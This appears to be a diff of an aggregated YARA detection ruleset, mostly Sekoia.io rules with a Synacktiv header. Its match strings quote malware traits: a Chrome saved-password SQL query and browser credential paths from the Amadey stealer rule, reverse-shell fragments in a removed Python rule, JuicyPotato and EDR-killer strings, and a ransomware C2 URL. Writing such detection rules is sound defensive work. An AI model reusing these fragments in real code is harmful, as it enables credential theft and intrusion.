+		logic_hash = "19f831f77e043f11b790b7f24e9f585e4986d9af6580bae7c344b7960f2f0965"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "989cf96da60d9ebfb6f364717b4f0cae1667fdc7f9d89f77acc254ab47d439e6"
 
 	strings:
-		$ = "').innerHTML;window['" ascii fullword
-		$ = "='at'+'ob';"
-		$ = "]('*','');"
-		$ = "display:none"
-		$ = "0px;\" onerror=\""
-		$ = "'ev'+'"
-		$ = "<!DOCTYPE html PUBLIC"
+		$s1 = "DP_Main.exe" ascii wide
+		$s2 = "DP_MainForm" ascii wide
+		$s3 = "DP_Main" ascii wide
+		$s4 = "#DECRYPT MY FILES#.html" ascii wide
+		$s5 = "/api/Encrypted.php" ascii wide
+		$s6 = "http://upload.paradisenewgenshinimpact.top:2095" ascii wide
+		$s7 = "main@paradisenewgenshinimpact.top" ascii wide
+		$s8 = ".honkai" ascii wide
 
 	condition:
-		5 of them and filesize < 1MB
+		uint16be( 0 ) == 0x4d5a and 6 of them
 }
-rule SEKOIA_Loader_Win_Goshellcode : FILE
+rule SEKOIA_Apt_Gamaredon_Gammaload_Maliciouslnk : FILE
 {
 	meta:
-		description = "Finds GoShellcode samples based on the specific strings"
+		description = "Detects Gamaredon's GammaLoad LNK"
 		author = "Sekoia.io"
-		id = "61346225-325a-4067-a4d6-3b8c001dd380"
-		date = "2023-11-15"
+		id = "2612e6c6-0bda-4bfa-a840-aa0a0b4c945b"
+		date = "2022-08-01"
 		modified = "2024-12-19"
-		reference = "https://github.com/yoda66/GoShellcode/blob/main/gosc.go"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_goshellcode.yar#L1-L23"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_gammaload_maliciouslnk.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "48ec87f284fbd14cbdb6b6b0f2e0fa6eb5ea19f112648660e0b8e525c562e3fc"
+		logic_hash = "94ba156cd6697a9999b6a4f78c4356ea3382b7b3e7a1af79d488aa34df2c3b40"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "94445af999055bf7d7cddc0d1d5183ab2776d85285f0522a28fac6c5a6101906"
-		hash2 = "fdea8b01b2597ceafe6f08b5fd12cc603b1e3ce2037731c0b6defde6935b1ce0"
 
 	strings:
-		$str01 = "main.VirtualAlloc" ascii
-		$str02 = "main.RtlMoveMemory" ascii
-		$str03 = "syscall.Syscall" ascii
-		$str04 = "syscall.NewLazyDLL" ascii
-		$str05 = "runtime.getGetProcAddress" ascii
-		$str06 = "runtime.useAeshash" ascii
+		$mshta = "System32\\mshta.exe"
+		$trait = { 0D 0A ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 0D 0A }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $str* ) and filesize < 8MB
+		uint32be( 0 ) == 0x4c000000 and #trait > 100 and $mshta and filesize > 100KB and filesize < 300KB
 }
-rule SEKOIA_Dropper_Mac_Lazarus_Manuscrypt : FILE
+rule SEKOIA_Tool_Chisel_Strings : FILE
 {
 	meta:
-		description = "MacOS Manuscrypt dropped by TraderTraitor"
+		description = "Detects Chisel"
 		author = "Sekoia.io"
-		id = "6138bd0c-1fcf-4586-b2b6-29955c7d6266"
-		date = "2022-04-19"
+		id = "667a8aa3-772b-45f1-8c89-acb7b976888d"
+		date = "2024-03-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/dropper_mac_lazarus_manuscrypt.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_chisel_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "dced1acbbe11db2b9e7ae44a617f3c12d6613a8188f6a1ece0451e4cd4205156"
-		hash = "9d9dda39af17a37d92b429b68f4a8fc0a76e93ff1bd03f06258c51b73eb40efa"
-		logic_hash = "dbe75a34f91906fc275c04af0fc068923993bab37a7574b3fe38733d87f31835"
+		logic_hash = "fe389d9d0ae73c79f1040274e21135d4df645c5ac672fc824923f0a5a085be8a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -259849,26 +259939,28 @@ rule SEKOIA_Dropper_Mac_Lazarus_Manuscrypt : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "networksetup -getwebproxy '%s'" ascii
-		$ = "Cookie: _ga=%s%02d%d%d%02d%s" ascii
-		$ = "networksetup -listallnetworkservices" ascii
-		$ = "gid=%s%02d%d%03d%s" ascii
+		$ = "tunnel.(*Tunnel).handleSSHChannel."
+		$ = "server.(*Server).handleWebsocket"
+		$ = "tunnel.(*udpHandler)"
+		$ = "server.(*Server).tlsLetsEncrypt"
+		$ = "cnet.(*wsConn).SetPingHandler.(*Conn)"
+		$ = "tunnel.(*udpConns).dial."
 
 	condition:
-		uint32( 0 ) == 0xFEEDFACF and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 15MB and 3 of them
 }
-rule SEKOIA_Apt_Gobrat_2 : FILE
+rule SEKOIA_Infostealer_Win_Fwit_Strings : FILE
 {
 	meta:
-		description = "Detects GobRat related files"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "6b7e38f5-00bc-49c8-b34d-3e878bf426d8"
-		date = "2024-09-10"
+		id = "332e89ad-d1fe-4da6-9354-0978ef173e78"
+		date = "2023-06-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gobrat_2.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_fwit_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9f2fdbe2cc39c91b2ac8904fb29a0142bf770859d17590017920203641860a13"
+		logic_hash = "4e28b6d67e2087b2f28817b19812b8bd56227175cd3d9c7037290127d4ec05a5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -259876,24 +259968,25 @@ rule SEKOIA_Apt_Gobrat_2 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "thisisweird" ascii
-		$ = "ZzZzZzZzZzZz"
+		$s1 = "C:\\ProgramData\\Temp" wide
+		$s2 = "{:08x}" wide
+		$s3 = "CURL_SSLVERSION" ascii
 
 	condition:
-		all of them and uint32be( 0 ) == 0x7f454c46
+		( uint16be( 0 ) == 0x4d5a ) and all of them
 }
-rule SEKOIA_Hacktool_Earthworm_Strings : FILE
+rule SEKOIA_Infostealer_Win_Solarmarker_Dll : FILE
 {
 	meta:
-		description = "Detects Mac/Win/Linux EarthWorm based on strings"
+		description = "Finds SolarMarker DLL based on characteristic strings"
 		author = "Sekoia.io"
-		id = "6c9b0225-8c41-49f9-9745-245bc7ef942f"
-		date = "2022-02-08"
+		id = "a2fe7f09-7134-4054-ba40-5ea66785a26c"
+		date = "2022-12-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_earthworm_strings.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_solarmarker_dll.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0460c62fefc3d594ca758a37fbe1716182ffdca2920fedd32a707f7117702176"
+		logic_hash = "5be0a95adb7e486cdec5f0e8433afed41516fc1a990e1d1ba00db7e8fb32dbbb"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -259901,53 +259994,69 @@ rule SEKOIA_Hacktool_Earthworm_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "the read url is %s"
-		$ = "--> %3d <-- (close)used tunnel %d , unused tunnel %d"
-		$ = "ssocksd 0.0.0.0:%d <--[%4d usec]--> socks server"
-		$ = "could not create one way tunnel"
+		$zka = "zkabsr" wide
+		$str0 = "set_PersistKeyInCsp" ascii
+		$str1 = "get_IV" ascii
+		$str2 = "get_MachineName" ascii
+		$str3 = "get_Current" ascii
+		$str4 = "ps_script" ascii
+		$str5 = "request_data" ascii
+		$str6 = "WindowsBuiltInRole" ascii
+		$str7 = "DllImportAttribute" ascii
+		$str8 = "get_BlockSize" ascii
+		$str9 = "GetRequestStream" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xcffaedfe ) and filesize < 100KB and 3 of them
+		uint16( 0 ) == 0x5A4D and ( ( $zka and 3 of ( $str* ) ) or ( all of ( $str* ) ) ) and filesize < 1MB
 }
-rule SEKOIA_Ransomware_Win_Masons_Jan2023 : FILE
+rule SEKOIA_Loader_Amadey_Stealer_Plugin : FILE
 {
 	meta:
-		description = "Rule to detect Masons ransomware samples."
+		description = "Finds Amadey's stealer plugin based on characteristic strings"
 		author = "Sekoia.io"
-		id = "cf2af08b-b4a8-4245-9308-242e15aeb346"
-		date = "2023-02-13"
+		id = "50154e39-98b3-40e5-8986-18bbb7b15647"
+		date = "2023-05-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_masons_jan2023.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_amadey_stealer_plugin.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "05badf0364c6f61cd081a3ae64bc92b48e6f59c026a5d6b5b68acd5a8987cf91"
+		logic_hash = "0410492f9424797b670a14f43ce063458e59d7958e213c07c3d488a40bf370e6"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "7826978642c568f975e2b65d1575fdf92e634f7c80db2c86c9d7c8066e8955b8"
 
 	strings:
-		$s1 = "Masons" wide
-		$s2 = "@mineralIaha/@root_king1" wide
-		$s3 = "Glory @six62ix" wide
+		$str01 = "STEALERDLL.dll" ascii
+		$str02 = "?wal=1" fullword ascii
+		$str03 = "Content-Disposition: form-data; name=\"data\"; filename=\"" ascii
+		$str04 = "tar.exe -cf \"" ascii
+		$str05 = "SELECT origin_url, username_value, password_value FROM logins" ascii
+		$str06 = "\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
+		$str07 = "\\SputnikLab\\Sputnik\\User Data\\Default\\Login Data" ascii
+		$str08 = "\\Mozilla\\Firefox\\Profiles\\" ascii
+		$str09 = "\"hostname\":\"([^\"]+)\"" ascii
+		$str10 = "\"encryptedUsername\":\"([^\"]+)\"" ascii
+		$str11 = "\"encryptedPassword\":\"([^\"]+)\"" ascii
+		$str12 = "&cred=" fullword ascii
+		$str13 = "D:\\Mktmp\\Amadey\\StealerDLL\\x64\\Release\\STEALERDLL.pdb" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint16( 0 ) == 0x5A4D and 7 of them
 }
-rule SEKOIA_Apt_Gamaredon_Gammaload_Maliciouslnk : FILE
+rule SEKOIA_Tool_Juicypotato_Exploit_Strings : FILE
 {
 	meta:
-		description = "Detects Gamaredon's GammaLoad LNK"
+		description = "Detects the JuicyPotato exploit based on strings"
 		author = "Sekoia.io"
-		id = "2612e6c6-0bda-4bfa-a840-aa0a0b4c945b"
-		date = "2022-08-01"
+		id = "03d697ae-69a7-490b-8b3c-9a8c21fb46a2"
+		date = "2022-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_gammaload_maliciouslnk.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_juicypotato_exploit_strings.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "94ba156cd6697a9999b6a4f78c4356ea3382b7b3e7a1af79d488aa34df2c3b40"
+		logic_hash = "ef23ea2931a1b6e094c0d7bb813305c09a2214ce36680ae057926dfdc1105c80"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -259955,57 +260064,59 @@ rule SEKOIA_Apt_Gamaredon_Gammaload_Maliciouslnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$mshta = "System32\\mshta.exe"
-		$trait = { 0D 0A ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 0D 0A }
+		$ = "JuicyPotato v%s"
+		$ = "-t createprocess call: <t> CreateProcessWithTokenW"
+		$ = "-p <program>: program to launch"
+		$ = "-l <port>: COM server listen port"
+		$ = "-m <ip>: COM server listen address"
+		$ = "-n <port>: RPC server listen port"
+		$ = "Error - Unknown NTLM message type..."
+		$ = "[+] authresult %d"
+		$ = "Waiting for auth..."
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and #trait > 100 and $mshta and filesize > 100KB and filesize < 300KB
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and 2 of them
 }
-rule SEKOIA_Tool_Realblindingedr_Strings : FILE
+rule SEKOIA_Apt_Unk_Hrserv_Memory_Commands_Strings
 {
 	meta:
-		description = "Detects RealBlindingEDR based on strings"
+		description = "Detects HrServ web shell memory commands"
 		author = "Sekoia.io"
-		id = "505dcbee-ae37-47c1-a322-2c52d10e68d7"
-		date = "2024-09-11"
+		id = "1b5f442a-e758-4bd5-a612-8b504a542d29"
+		date = "2023-11-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_realblindingedr_strings.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_unk_hrserv_memory_commands_strings.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "cb6219e2b6577b8d4a18114d595e10d7"
-		hash = "d0a251709c24a8f4c26d456dea22d90f"
-		logic_hash = "7b6a54c935bb40bd1be1d25be452d7185fd6f9dacbd7cbcde7cb37dfea09775e"
+		logic_hash = "a87c35658ded301c098f9ee8ee5886a54e89537eabd145cf82b0286c703a77d2"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Unload Driver Error 1"
-		$ = "Failed to create pipe. Error %d"
-		$ = "icacls \"%s\" /grant Everyone:(F)"
-		$ = "Register MiniFilter Callback driver:"
-		$ = "The driver's certificate has been revoked,"
-		$ = "[Success] Killed %s(%s)."
-		$ = "ntoskrnl.exe base address not found."
+		$ = "list all the process" ascii wide
+		$ = "equal with cmd /c tasklist" ascii wide
+		$ = "start target service by name" ascii wide
+		$ = "query local process information by wmi." ascii wide
+		$ = "upload local shellcode to" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them
+		all of them
 }
-
-rule SEKOIA_Merlin_Win_Dll : FILE
+rule SEKOIA_Apt_Kimsuky_Toddlershark_Obfuscated : FILE
 {
 	meta:
-		description = "Detects Merling agent (DLL)"
+		description = "Detects obfuscated version of Kimsuky TODDLERSHARK vbs malware"
 		author = "Sekoia.io"
-		id = "c9c57f5e-26c3-43be-b2cf-10f5129d3be5"
-		date = "2022-01-03"
+		id = "9ab82466-4f38-4597-b75b-13252e180c70"
+		date = "2024-03-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/merlin_win_dll.yar#L4-L42"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_toddlershark_obfuscated.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "eefaed10bd3accc884673437a1cc6b8c503db4ef797e58bd95daec36a297c4be"
+		logic_hash = "5f067ce32e7fee5cf481d82bb98f4ae10bd7187078bc111b08fc58d043954152"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -260013,27 +260124,26 @@ rule SEKOIA_Merlin_Win_Dll : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = ".CRT" ascii
-		$s2 = ".tls" ascii
-		$s3 = "github.com/Ne0nd0g/merlin" ascii
-		$s4 = "github.com/lucas-clemente" ascii
-		$s5 = "SendMerlinMessage" ascii
+		$s1 = { 3a 20 [3-10] 20 3d 20 22 [3-30] 22 3a }
+		$s2 = { 45 78 65 63 75 74 65 28  [3-15] 28 22 }
+		$s3 = { 50 72 69 76 61 74 65 20 46 75 6e 63 74 69 6f 6e 20 [3-15] 28 42 79 56 61 6c 20 [3-15] 29 3a }
+		$s4 = "& Chr(\"&H\" & Mid("
 
 	condition:
-		uint16( 0 ) == 0x5A4D and pe.imphash ( ) == "da7f8acb6151c95be088a02465d68ef8" and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "491d9a18aea3d0eb3653fdaf0b9b86bb" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d41d8cd98f00b204e9800998ecf8427e" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "bf619eac0cdf3f68d496ea9344137e8b" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ce7969c1e894363133e386361be064e5" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c6179cdcd9ba0758a18a1280f98062eb" ) and all of them and $s1 at 712 and $s2 at 752 and filesize < 15MB
+		#s4== 1 and #s3 == 1 and #s2 == 1 and #s1 > 20 and filesize < 1MB
 }
-rule SEKOIA_Hacktool_Mimikatz_Obfuscated : FILE
+rule SEKOIA_Implant_Win_Geacon : FILE
 {
 	meta:
-		description = "Detects Mimikatz on strings obfuscation"
+		description = "Finds Geacon samples based on specific strings"
 		author = "Sekoia.io"
-		id = "bac4bb61-d250-4fc3-95a5-edd4e3c7ff83"
-		date = "2022-07-22"
+		id = "064eabe0-aee5-4e5e-9f5e-69b32b1ba0da"
+		date = "2024-01-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_mimikatz_obfuscated.yar#L1-L25"
+		reference = "https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/implant_win_geacon.yar#L1-L35"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9f75e10122df0f57382e939d82b0ab4047d3d42f198c59faa22177d6d5d9afd7"
+		logic_hash = "74b0d2fbb8b7f6666543ba4fdfd9f9d2064d3a89d21c90d794b57f0009199fea"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -260041,85 +260151,96 @@ rule SEKOIA_Hacktool_Mimikatz_Obfuscated : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$xor1 = "Benjamin Delpy" xor
-		$xor2 = "sekurlsa" xor wide
-		$xor3 = "minidumpfile.dmp" wide
-		$xor4 = "lsadump_dcsync" xor wide
-		$xor5 = "kuhl_m_lsadump_getSamKey" xor wide
-		$b1 = "Benjamin Delpy" base64
-		$b2 = "sekurlsa" base64 wide
-		$b3 = "minidumpfile.dmp" base64 wide
-		$b4 = "lsadump_dcsync" base64 wide
-		$b5 = "kuhl_m_lsadump_getSamKey" base64 wide
+		$gea01 = "geacon/config.init" ascii
+		$gea02 = "geacon_pro-master/config/config.go" ascii
+		$gea03 = "geacon_plus-main/config/config.go" ascii
+		$gea04 = "command type %d is not support by geacon now" ascii
+		$gea05 = "main/sysinfo.GeaconID" ascii
+		$str01 = "command.StealToken" ascii
+		$str02 = "command.MakeToken" ascii
+		$str03 = "command/misc.go" ascii
+		$str04 = "config/c2profile.go" ascii
+		$str05 = "crypt.AesCBCDecrypt" ascii
+		$str06 = "packet.File_Browse" ascii
+		$str07 = "packet.FirstBlood" ascii
+		$str08 = "packet.ParseCommandShell" ascii
+		$str09 = "packet.ParseCommandUpload" ascii
+		$str10 = "packet.PushResult" ascii
+		$str11 = "sysinfo.GetComputerName" ascii
+		$str12 = "sysinfo.IsOSX64" ascii
+		$str13 = "util..inittask" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them and filesize < 5MB
+		uint16( 0 ) == 0x5A4D and ( ( 1 of ( $gea* ) and 2 of ( $str* ) ) or 8 of ( $str* ) )
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_2 : FILE
+rule SEKOIA_Infostealer_Win_Whitesnake_Xor_Rc4_July12 : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detects WhiteSnake Stealer XOR and RC4 version"
 		author = "Sekoia.io"
-		id = "02bc795f-b8e0-44d4-b475-310359867577"
-		date = "2023-02-03"
+		id = "f2ebfcbd-9667-459a-a543-ce0be62c0dc4"
+		date = "2023-07-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_2.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_whitesnake_xor_rc4_july12.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c26779cd35d6430da3629df8b310356d663c05e82db0aca0fc974bc3a298c92e"
+		logic_hash = "f14b95e5cb6ffaab14d0890847fe6e9dcfc3ee0b884c34d24d786420e2411a80"
 		score = 75
-		quality = 80
+		quality = 76
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "var e={},i,b=0,c,x,l=0,a,r="
-		$ = "eval(plain);"
-		$ = "var plain = rc4("
+		$1 = {FE 0C 00 00 FE 09 00 00 FE 0C 02 00 6F ?? 00 00 0A FE 0C 03 00 61 D1 FE 0E 04 00 FE}
+		$2 = {61 6e 61 6c 2e 6a 70 67}
+		$3 = {73 68 69 74 2e 6a 70 67}
+		$4 = {FE 0C ?? 00 20 00 01 00 00 3F ?? FF FF FF 20 00 00 00 00 FE 0E ?? 00 38 ?? 00 00 00 FE 0C}
+		$5 = "qemu" wide
+		$6 = "vbox" wide
 
 	condition:
-		all of them and filesize < 2MB
+		($1 and $2 and filesize < 600KB ) or ( $3 and $4 and $5 and $6 and filesize < 300KB )
 }
-rule SEKOIA_Apt_Andariel_Dorarat_Strings : FILE
+rule SEKOIA_Apt_Susp_Apt28_Uac0063_Hta_Loader
 {
 	meta:
-		description = "Detects Dora RAT based on strings"
+		description = "Detects some suspected APT28 HTA loader"
 		author = "Sekoia.io"
-		id = "30388291-a287-489f-a060-c90a16cda217"
-		date = "2024-06-17"
+		id = "8e1889c1-c6ac-4048-9d3a-99ccbbd5435f"
+		date = "2024-07-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_andariel_dorarat_strings.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_susp_apt28_uac0063_hta_loader.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "21e1c77d486cbf6ddaa2eca673275c7c21cc59fa9551c2eb02c526518ed5b217"
-		score = 75
+		hash = "332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725"
+		logic_hash = "494331a8088d350e4e49e67fe64041d451886e501775413f908bd9b3faa98aeb"
+		score = 65
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$x1 = "/encryption.go" ascii fullword
-		$x2 = "/handshake.go" ascii fullword
-		$x3 = "/trans_module.go" ascii fullword
-		$enc_rsc = { 14 02 72 14 D3 4C 4A 49 55 36 14 DF 8D 6F 2D CF }
+		$ = "<HEAD><HTA:APPLICATION ID" ascii fullword
+		$ = "id=service>null</span" ascii fullword
+		$ = "script Language=\"VBScript.Encode" ascii fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and ( all of ( $x* ) or $enc_rsc )
+		2 of them
 }
-rule SEKOIA_Generic_Python_Reverse_Shell : FILE
+rule SEKOIA_Hacktool_Sharpview_Strings : FILE
 {
 	meta:
-		description = "Detects simple reverse shell written in Python"
+		description = "Detects SharpView based on strings."
 		author = "Sekoia.io"
-		id = "ab25f8db-e39d-4aa4-b431-cf5cd2e038e5"
-		date = "2023-12-08"
+		id = "585ead98-36d0-402c-b527-4dec308cb1c9"
+		date = "2022-02-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_python_reverse_shell.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_sharpview_strings.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ced9923ef8018796545d93d9ac8ba3138dd7d4e79db742eb3babcd94c8d3c304"
+		logic_hash = "762e8d292e052cb0922743c2f5b14170e91fe440e05331892b20b5921e0559da"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -260127,19 +260248,21 @@ rule SEKOIA_Generic_Python_Reverse_Shell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "import pty"
-		$ = "lhost ="
-		$ = "os.dup2(s.fileno(),0)"
-		$ = "os.putenv(\"HISTFILE\",'/dev/null')"
+		$ = "Args_Get_DomainGPOComputerLocalGroupMapping"
+		$ = "Args_Get_ForestGlobalCatalog"
+		$ = "Args_Find_DomainLocalGroupMember"
+		$ = "Args_Get_DomainFileServer"
+		$ = "Ex: SharpView.exe Method-Name" wide
+		$ = "[Get-PathAcl] error: {0}" wide
 
 	condition:
-		filesize < 1KB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 800KB and 5 of them
 }
 /*
  * YARA Rule Set
  * Repository Name: Synacktiv
  * Repository: https://github.com/synacktiv/synacktiv-rules
- * Retrieval Date: 2026-02-22
+ * Retrieval Date: 2026-03-01
  * Git Commit: d234cc4da0783db7dca56ae8dd5252afdc248df8
  * Number of Rules: 8
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -260165,182 +260288,6 @@ If you use the Rules (including in modified form) on data, messages based on mat
 
